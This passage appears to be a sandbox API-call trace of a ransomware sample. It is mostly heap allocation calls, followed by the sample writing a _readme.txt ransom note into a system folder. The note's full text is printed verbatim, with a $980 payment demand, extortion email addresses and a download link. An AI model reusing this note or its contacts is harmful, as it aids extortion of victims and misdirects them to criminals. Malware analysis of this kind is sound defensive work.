lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.704] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.704] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.704] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.705] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.705] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.705] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.705] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.705] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.705] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.705] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.705] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.705] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.705] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.705] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.705] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.705] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.705] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.705] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.705] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.705] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.705] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.705] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.705] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.705] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.705] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.705] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.706] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.706] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.706] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.706] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.706] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.706] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.706] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.706] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.706] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.706] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.707] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.707] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.707] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.707] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.707] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.707] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.707] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.707] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.707] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.707] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.707] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.708] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.708] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.708] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.708] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.708] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.708] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.708] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.708] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.708] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.708] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.708] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.708] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.709] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.709] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.709] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.709] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.709] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.709] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.709] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.709] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.709] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.709] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.709] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.709] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.710] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.710] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.710] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.710] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.710] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.710] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.710] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.710] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.710] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.710] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.710] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.710] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.710] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.710] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.710] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.710] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.710] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.710] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.710] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.710] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.710] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.710] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.710] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.710] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.710] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.711] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.711] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.711] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.711] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.711] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.711] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.711] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.711] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.711] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.711] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.711] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.711] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.711] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.711] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.711] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.711] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.711] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.711] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.711] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.711] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.711] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.711] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.711] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.711] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.711] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.711] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.711] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.711] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.711] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.712] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.712] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.712] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.712] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.712] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.712] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.712] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.712] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.712] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.712] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.712] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.712] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.712] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.712] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.712] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.712] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.712] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.712] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0165.712] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.712] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.712] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.712] PathFindFileNameW (pszPath="") returned="" [0165.712] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.713] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.713] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.713] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.713] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.713] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.713] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.713] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.713] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0165.713] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.713] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.713] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0165.715] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.715] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.715] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact 